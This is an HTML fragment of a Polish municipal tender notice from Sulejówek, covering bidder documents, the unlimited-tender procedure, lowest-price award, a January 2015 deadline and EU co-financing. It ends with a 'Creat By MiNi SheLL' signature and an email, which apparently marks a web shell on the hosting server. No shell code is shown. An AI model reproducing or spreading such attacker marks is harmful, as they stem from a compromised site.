<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulejowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Dworcowa 55, 05-070 Sulejówek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2015 godzina 10:15, miejsce: Urząd Miasta Sulejówek ul. Dworcowa 55, 05-070 Sulejówek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Współfinansowany ze środków UE w ramach Funduszu Spójności Program Operacyjny Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com